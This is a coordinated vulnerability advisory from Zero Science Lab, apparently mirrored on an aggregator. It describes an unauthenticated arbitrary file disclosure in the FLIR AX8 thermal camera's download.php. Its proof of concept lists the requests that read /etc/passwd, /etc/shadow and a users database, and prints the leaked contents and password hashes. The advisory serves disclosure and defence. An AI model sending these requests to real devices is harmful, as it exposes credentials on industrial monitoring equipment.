Lucene search

K
zeroscienceGjoko KrsticZSL-2018-5493
HistoryOct 14, 2018 - 12:00 a.m.

FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Arbitrary File Disclosure

2018-10-1400:00:00
Gjoko Krstic
zeroscience.mk
748

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

8.1 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.511 Medium

EPSS

Percentile

97.5%

Title: FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Arbitrary File Disclosure
Advisory ID: ZSL-2018-5493
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (4/5)
Release Date: 14.10.2018

Summary

Thermal Imaging Camera For Continuous Condition and Safety Monitoring FLIR AX8 is a thermal sensor with imaging capabilities. Combining thermal and visual cameras in a small, affordable package, the AX8 provides continuous temperature monitoring and alarming capabilities to protec critical electrical and mechanical equipment. The AX8 helps you guard against unplanned outages, service interruptions, and equipment failure.

The FLIR AX series camera/sensor also has built-in support to connect to industrial control equipment such as programmable logic controllers (PLCs), and allows the sharing of analysis and alarm results and simple control using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy to install, the AX8 provides continuous monitoring of electrical cabinets, process and manufacturing areas, data centers, energy generation and distribution, transportation and mass transit, storage facilities and refrigeration warehouses.

Description

The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed via the ‘file’ parameter in download.php is not properly verified before being used to download config files. This can be exploited to disclose the contents of arbitrary files via absolute path.

Vendor

FLIR Systems, Inc. - <https://www.flir.com>

Affected Version

Firmware: 1.32.16, 1.17.13
OS: neco_v1.8-0-g7ffe5b3
Hardware: Flir Systems Neco Board

Tested On

GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)
lighttpd/1.4.33
PHP/5.4.14

Vendor Status

[26.07.2018] Vulnerability discovered.
[17.08.2018] Vendor contacted.
[17.08.2018] Vendor replied forwarding message to appropriate team.
[21.08.2018] Vendor responds asking more details.
[22.08.2018] Replied to the vendor requesting PGP key.
[23.08.2018] Vendor sends PGP key.
[27.08.2018] Sent details to the vendor.
[29.08.2018] Vendor confirms the issues developing patches.
[29.08.2018] Working with the vendor.
[10.10.2018] Vendor updating folowing cyber security guide.
[14.10.2018] Coordinated public security advisory released.

PoC

flir_ax8_fd.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.flir.com/security/best-practices-for-cybersecurity/&gt;
[2] <https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf&gt;
[3] <https://www.flir.com/globalassets/security/cybersecurity-bulletin-10-12-18.pdf&gt;
[4] <https://www.exploit-db.com/exploits/45597/&gt;
[5] <https://packetstormsecurity.com/files/149798&gt;
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/151285&gt;
[7] <https://www.flir.com/globalassets/industrial/security/cybersecurity-bulletin-10-12-18.pdf&gt;
[8] <https://www.flir.com/globalassets/industrial/security/flir-pro-security-cyber-hardening-guide.pdf&gt;
[9] <https://vulners.com/cve/CVE-2022-37060&gt;

Changelog

[14.10.2018] - Initial release
[15.10.2018] - Added reference [4] and [5]
[17.10.2018] - Added reference [6]
[04.11.2022] - Added reference [7], [8] and [9]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Arbitrary File Disclosure


Vendor: FLIR Systems, Inc.
Product web page: https://www.flir.com
Affected version: Firmware: 1.32.16
                            1.17.13
                  OS: neco_v1.8-0-g7ffe5b3
                  Hardware: Flir Systems Neco Board

Summary: Thermal Imaging Camera For Continuous Condition and Safety
Monitoring FLIR AX8 is a thermal sensor with imaging capabilities.
Combining thermal and visual cameras in a small, affordable package,
the AX8 provides continuous temperature monitoring and alarming capabilities
to protec critical electrical and mechanical equipment. The AX8 helps
you guard against unplanned outages, service interruptions, and equipment
failure. 

The FLIR AX series camera/sensor also has built-in support to connect to
industrial control equipment such as programmable logic controllers (PLCs),
and allows the sharing of analysis and alarm results and simple control
using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy
to install, the AX8 provides continuous monitoring of electrical cabinets,
process and manufacturing areas, data centers, energy generation and distribution,
transportation and mass transit, storage facilities and refrigeration warehouses.

Desc: The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary 
file disclosure vulnerability. Input passed via the 'file' parameter in download.php
is not properly verified before being used to download config files. This can be
exploited to disclose the contents of arbitrary files via absolute path.

Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)
           lighttpd/1.4.33
           PHP/5.4.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5493
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5493.php


26.07.2018

--


1. GET http://192.168.1.34/download.php?file=/etc/passwd HTTP/1.1

root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
fliruser:x:1000:1000::/home/fliruser:/bin/sh
xuser:x:1001:1001::/home/xuser:/bin/sh
sshd:x:998:995::/var/run/sshd:/bin/false
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false


2. GET http://192.168.1.34/download.php?file=/etc/shadow HTTP/1.1

root:qA7LRQDa1amZM:17339:0:99999:7:::
daemon:*:17339:0:99999:7:::
bin:*:17339:0:99999:7:::
sys:*:17339:0:99999:7:::
sync:*:17339:0:99999:7:::
games:*:17339:0:99999:7:::
man:*:17339:0:99999:7:::
lp:*:17339:0:99999:7:::
mail:*:17339:0:99999:7:::
news:*:17339:0:99999:7:::
uucp:*:17339:0:99999:7:::
proxy:*:17339:0:99999:7:::
www-data:*:17339:0:99999:7:::
backup:*:17339:0:99999:7:::
list:*:17339:0:99999:7:::
irc:*:17339:0:99999:7:::
gnats:*:17339:0:99999:7:::
nobody:*:17339:0:99999:7:::
messagebus:!:17339:0:99999:7:::
fliruser:m1iiKYIJr63u2:17339:0:99999:7:::
xuser:!:17339:0:99999:7:::
sshd:!:17339:0:99999:7:::
avahi:!:17339:0:99999:7:::
avahi-autoipd:!:17339:0:99999:7:::


3. GET http://192.168.1.34/download.php?file=/FLIR/system/profile.d/userPreset.tar HTTP/1.1
   GET http://192.168.1.34/download.php?file=/FLIR/usr/www/FLIR/db/users.db HTTP/1.1

lqwrm@metalgear:~/$ sqlite3 users.db 
SQLite version 3.11.0 2016-02-15 17:29:24
Enter ".help" for usage hints.
sqlite&gt; .tables
roles  users
sqlite&gt; select * from roles;
1|admin
2|user
3|viewer
sqlite&gt; select * from users;
1|admin||$2y$10$/J/KDhh0.UDg5pbwtPG9B.W2gEWrS36qHji1scgxO7uiTk1GuAa.K|1
2|user||$2y$10$O5Ybml6qN9caTjezQR0f8.z230PavQYUwmZCzMVxL6BMeNvLWEr9q|2
3|viewer||$2y$10$lxA0o325EuUtVAaTItBt.OSpZSfxIrT56ntm7326FQ/fTBc0ODWqq|3
4|service||$2y$10$syAL0yMLBfN/8.sciVnCE.kBto6mtVvjrmyhPQAo7oV3rq8X8pBke|4
5|developer||$2y$10$LBNcMBC/Bn3VVnhlI1j7huOZ.UOykGaq3VZ.YAgu0mAZXAQ8q36uG|5
sqlite&gt;.q
</p></body></html>

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

8.1 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.511 Medium

EPSS

Percentile

97.5%